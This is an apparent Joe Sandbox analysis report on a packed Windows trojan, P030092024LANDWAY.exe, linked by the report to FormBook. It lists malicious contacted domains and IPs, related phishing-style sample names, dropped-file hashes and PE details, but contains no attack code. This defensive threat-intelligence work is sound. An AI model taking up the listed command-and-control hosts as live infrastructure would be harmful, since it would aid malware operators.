                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://www.ecosia.org/newtab/cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ac.ecosia.org/autocomplete?q=cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.mondayigboleague.infoBpYpWzndkWcpUJ.exe, 00000009.00000002.4615262258.000000000507F000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                                                                                  http://www.030002837.xyz/cgi-sys/suspendedpage.cgi?9jtPKX=n8oXMK/zoXmcmdl32.exe, 00000007.00000002.4614735338.000000000575A000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://github.com/necolas/normalize.csscmdl32.exe, 00000007.00000002.4614735338.0000000005DA2000.00000004.10000000.00040000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4607532068.0000000003A92000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdl32.exe, 00000007.00000002.4617448289.00000000079DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      172.191.244.62
                                                                                      		redirect.3dns.boxUnited States
                                                                                      		7018ATT-INTERNET4UStrue
                                                                                      172.217.31.4
                                                                                      		www.x4wrqqc2tn.sbsUnited States
                                                                                      		15169GOOGLEUSfalse
                                                                                      121.254.178.239
                                                                                      		www.it9.shopKorea Republic of
                                                                                      		3786LGDACOMLGDACOMCorporationKRtrue
                                                                                      65.21.196.90
                                                                                      		030002837.xyzUnited States
                                                                                      		199592CP-ASDEtrue
                                                                                      202.87.223.248
                                                                                      		www.18kwatch.comMalaysia
                                                                                      		24321OCENET-AS-APOCESdnBhdISPMYtrue
                                                                                      217.160.0.158
                                                                                      		accupower.techGermany
                                                                                      		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                      103.21.221.87
                                                                                      		rtpterbaruwaktu3.xyzunknown
                                                                                      		9905LINKNET-ID-APLinknetASNIDtrue
                                                                                      221.128.225.57
                                                                                      		www.cqghwamc.topChina
                                                                                      		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
                                                                                      203.161.41.205
                                                                                      		www.tophfy.infoMalaysia
                                                                                      		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                      3.33.130.190
                                                                                      		8zu934.vipUnited States
                                                                                      		8987AMAZONEXPANSIONGBtrue
                                                                                      85.159.66.93
                                                                                      		natroredirect.natrocdn.comTurkey
                                                                                      		34619CIZGITRtrue

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1522543
                                                                                      Start date and time:2024-09-30 10:40:10 +02:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 2s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:10
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:P030092024LANDWAY.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@14/11
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 87%
                                                                                      • Number of executed functions: 50
                                                                                      • Number of non-executed functions: 316
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      04:42:15API Interceptor8403237x Sleep call for process: cmdl32.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      172.191.244.62CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.lurknlarkk.xyz/cjjz/
                                                                                      PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.hermesmilano.xyz/f3mz/
                                                                                      DN.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.hermesmilano.xyz/f3mz/
                                                                                      COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.tekilla.wtf/fpzw/
                                                                                      65.21.196.90LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030002304.xyz/7b6l/
                                                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030003302.xyz/vkua/
                                                                                      PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                                      • www.070001350.xyz/ivyl/
                                                                                      FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030003112.xyz/dk22/
                                                                                      Purchase order.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.070001350.xyz/zvc6/
                                                                                      DOC092024-0431202229487.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030002304.xyz/tmpg/
                                                                                      Remittance advice.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.070001350.xyz/zvc6/
                                                                                      doc330391202408011.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030002060.xyz/oap7/
                                                                                      DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030002721.xyz/i28e/
                                                                                      yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                                                      • www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      natroredirect.natrocdn.comshipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      rAGROTIS10599242024.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      oO3ZmCAeLQ.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                      • 85.159.66.93
                                                                                      redirect.3dns.boxCITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      PO# Q919240.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      EGCS-875-S5-SMO M2A.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      AUG 2024 SOA.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      DN.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62
                                                                                      COTIZACION 290824.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.191.244.62

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ATT-INTERNET4UShttps://en.softonic.comGet hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.6
                                                                                      ITC590-Script 3 V2-P-2024.exeGet hashmaliciousUnknownBrowse
                                                                                      • 172.16.89.192
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elfGet hashmaliciousMiraiBrowse
                                                                                      • 12.156.153.37
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elfGet hashmaliciousMiraiBrowse
                                                                                      • 12.135.213.79
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                                                                                      • 99.56.191.33
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.28522.3483.elfGet hashmaliciousMiraiBrowse
                                                                                      • 12.161.30.134
                                                                                      https://ole798.com/Get hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.99
                                                                                      http://www.safari.com/Get hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.89
                                                                                      https://www.iphone.trustefy.org/Get hashmaliciousUnknownBrowse
                                                                                      • 13.32.27.83
                                                                                      https://elderly-same-archeology.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                      • 13.32.27.111
                                                                                      LGDACOMLGDACOMCorporationKRSecuriteInfo.com.Linux.Siggen.9999.10361.13333.elfGet hashmaliciousMiraiBrowse
                                                                                      • 1.216.60.60
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 210.182.29.70
                                                                                      rsJtZBgpwG.elfGet hashmaliciousMiraiBrowse
                                                                                      • 1.216.113.49
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.181.24.133
                                                                                      6NlY2E3Wqi.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.40.39.251
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.171.233.126
                                                                                      SecuriteInfo.com.Linux.Siggen.9999.11593.30273.elfGet hashmaliciousUnknownBrowse
                                                                                      • 58.73.24.2
                                                                                      OcH6iVxcMe.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.181.24.133
                                                                                      jade.mips.elfGet hashmaliciousMiraiBrowse
                                                                                      • 112.222.230.14
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 211.171.233.126
                                                                                      OCENET-AS-APOCESdnBhdISPMYhttps://srirakyat.i-ruma.com/RegisterNewResident?p=dbfe6cc3-1784-494c-b756-f53c8ffa4033Get hashmaliciousUnknownBrowse
                                                                                      • 118.107.235.89
                                                                                      ImVMtU7aeB.elfGet hashmaliciousMiraiBrowse
                                                                                      • 118.107.193.237
                                                                                      file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousDanaBot, SmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                      • 61.4.102.15
                                                                                      CP-ASDEhttps://quatangff-garena.pw.io.vn/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 65.21.235.194
                                                                                      file.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                                                      • 65.21.18.51
                                                                                      Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                      • 65.21.196.90
                                                                                      https://claim.eventsmidasbuys.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                      • 65.21.235.194
                                                                                      Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                      • 65.21.196.90
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                                                                      • 65.21.18.51
                                                                                      https://bn54.donegabang.com/Get hashmaliciousUnknownBrowse
                                                                                      • 65.21.235.194
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5SystemzBrowse
                                                                                      • 65.21.18.51
                                                                                      eovQPjY5wz.exeGet hashmaliciousLummaC, RedLineBrowse
                                                                                      • 65.21.18.51
                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog StealerBrowse
                                                                                      • 65.21.18.51

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Temp\3f75FH48

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmdl32.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1239949490932863
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\hepatoduodenostomy

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\P030092024LANDWAY.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):287744
                                                                                      Entropy (8bit):7.995193704126155
                                                                                      Encrypted:true
                                                                                      SSDEEP:6144:d3m9leIdqlG11PBY1kqunQ1NQI6iM07kMYF5QIQR:5mC/lGCiq+Q1NQIBfVs9QR
                                                                                      MD5:D5AE76C885DCB9BF01F253E3E556E58F
                                                                                      SHA1:E3A052B78859390DDA5BCEEE044BE36551B9F4F6
                                                                                      SHA-256:1D24C71A3D3A46C6C025BCF1199C91FF796303114844A5566EFFD59E42B4AD59
                                                                                      SHA-512:500714D4049D378625717EBEC8C38A7FA1D858BB679AF2E62A024F1E34B6A16422936BE3D3E3BE1E037833FA36C17B8608D06E68710D214040F5262544ABE4B2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...b.YQ7Hl..B....v.RF..x3>...H4L8K3YBKJMRE1LIP06YQ7H4L8K3YB.JMRK..GP.?.p.Ix...[01k:?="C-$pSW7?X<..]kA,,k##r.~.i=_R<.:E>h8K3YBKJ4SL.q)7..96.uT+.Q..q**._..lPQ.K...pX,..+("p2".LIP06YQ7.qL8.2XB...3E1LIP06Y.7J5G9@3Y.OJMRE1LIP06LQ7H$L8KC]BKJ.RE!LIP26YW7H4L8K3_BKJMRE1L9T06[Q7H4L8I3..KJ]RE!LIP0&YQ'H4L8K3IBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3w6.29RE1..T06IQ7HfH8K#YBKJMRE1LIP06Yq7HTL8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4L8K3YBKJMRE1LIP06YQ7H4

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                      Entropy (8bit):7.9807729692267815
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 94.59%
                                                                                      • AutoIt3 compiled script executable (510682/80) 4.83%
                                                                                      • UPX compressed Win32 Executable (30571/9) 0.29%
                                                                                      • Win32 EXE Yoda's Crypter (26571/9) 0.25%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      File name:P030092024LANDWAY.exe
                                                                                      File size:1'054'545 bytes
                                                                                      MD5:3ffb03ef28aff93d8cd6b83911d700ee
                                                                                      SHA1:4322b8a74fed0809dca565feff13bae1c60196d4
                                                                                      SHA256:0efac5788be9dbd7b74affa2c8f6c14a2b6cce84d981d0b088566e50eefc72e4
                                                                                      SHA512:03d81a9304653be5901e5548b723beabd8a673eabb8b3b3e319806c2f7b0812e8d419dfdf9ec33e31d798abb1a13665d9b05c3a2717d1176279fad740fc6379f
                                                                                      SSDEEP:24576:VD0tM85tbNJjldeYiYVq2AwvdNCf8WsN0Pg4FMOrGDks3+oRqXY:VD0tM85DJjl/iY0wvdNm8WsqDFMOFoRV
                                                                                      TLSH:8825230B915482F9D95B2B39AED73AC61679FC62303212534F6779AF1D29F3840123FA
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                      File Icon

                                                                                      Icon Hash:1733312925935517

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4b8b90
                                                                                      Entrypoint Section:UPX1
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:0
                                                                                      File Version Major:5
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:77b2e5e9b52fbef7638f64ab65f0c58c

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      pushad
                                                                                      mov esi, 00477000h
                                                                                      lea edi, dword ptr [esi-00076000h]
                                                                                      push edi
                                                                                      jmp 00007F8CBC6F94ADh
                                                                                      nop
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      mov byte ptr [edi], al
                                                                                      inc edi
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F948Fh
                                                                                      mov eax, 00000001h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc eax, eax
                                                                                      add ebx, ebx
                                                                                      jnc 00007F8CBC6F94ADh
                                                                                      jne 00007F8CBC6F94CAh
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F94C1h
                                                                                      dec eax
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc eax, eax
                                                                                      jmp 00007F8CBC6F9476h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc ecx, ecx
                                                                                      jmp 00007F8CBC6F94F4h
                                                                                      xor ecx, ecx
                                                                                      sub eax, 03h
                                                                                      jc 00007F8CBC6F94B3h
                                                                                      shl eax, 08h
                                                                                      mov al, byte ptr [esi]
                                                                                      inc esi
                                                                                      xor eax, FFFFFFFFh
                                                                                      je 00007F8CBC6F9517h
                                                                                      sar eax, 1
                                                                                      mov ebp, eax
                                                                                      jmp 00007F8CBC6F94ADh
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F946Eh
                                                                                      inc ecx
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jc 00007F8CBC6F9460h
                                                                                      add ebx, ebx
                                                                                      jne 00007F8CBC6F94A9h
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      adc ecx, ecx
                                                                                      add ebx, ebx
                                                                                      jnc 00007F8CBC6F9491h
                                                                                      jne 00007F8CBC6F94ABh
                                                                                      mov ebx, dword ptr [esi]
                                                                                      sub esi, FFFFFFFCh
                                                                                      adc ebx, ebx
                                                                                      jnc 00007F8CBC6F9486h
                                                                                      add ecx, 02h
                                                                                      cmp ebp, FFFFFB00h
                                                                                      adc ecx, 02h
                                                                                      lea edx, dword ptr [edi+ebp]
                                                                                      cmp ebp, FFFFFFFCh
                                                                                      jbe 00007F8CBC6F94B0h
                                                                                      mov al, byte ptr [edx]

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ASM] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [C++] VS2008 SP1 build 30729
                                                                                      • [ C ] VS2005 build 50727
                                                                                      • [IMP] VS2005 build 50727
                                                                                      • [ASM] VS2008 build 21022
                                                                                      • [RES] VS2008 build 21022
                                                                                      • [LNK] VS2008 SP1 build 30729

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc00380x3b0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x7038.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      UPX00x10000x760000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      UPX10x770000x420000x41e00f914a8d655ae07ad6878d428980d492eFalse0.9933401031783681data7.929619295565276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0xb90000x80000x7400375506aad8714493f389985f5be0ee28False0.5646214978448276data5.905766661808417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xb95cc0x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                      RT_ICON0xb96f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                      RT_ICON0xb98240x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                      RT_ICON0xb99500x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                      RT_ICON0xb9fbc0x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
